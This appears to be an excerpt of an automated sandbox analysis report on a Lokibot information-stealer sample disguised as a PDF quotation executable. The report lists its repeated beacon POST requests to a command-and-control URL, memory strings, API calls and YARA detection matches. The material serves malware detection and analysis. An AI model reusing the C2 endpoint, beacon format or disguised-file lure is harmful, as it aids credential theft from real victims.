Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 16:28:12 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 16:28:14 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: Cotizaci#U00f3npdf.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Cotizaci#U00f3npdf.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Cotizaci#U00f3npdf.exe, 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp	String found in binary or memory: http://slimpackage.com/slimmain/five/fre.php
Source: Cotizaci#U00f3npdf.exe, Cotizaci#U00f3npdf.exe, 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, Cotizaci#U00f3npdf.exe, 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/

Source: unknown

HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 192Connection: close

Source: unknown

DNS traffic detected: queries for: slimpackage.com

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Code function: 1_2_00404ED4 recv,

1_2_00404ED4

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Code function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404F61

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group

Source: Cotizaci#U00f3npdf.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
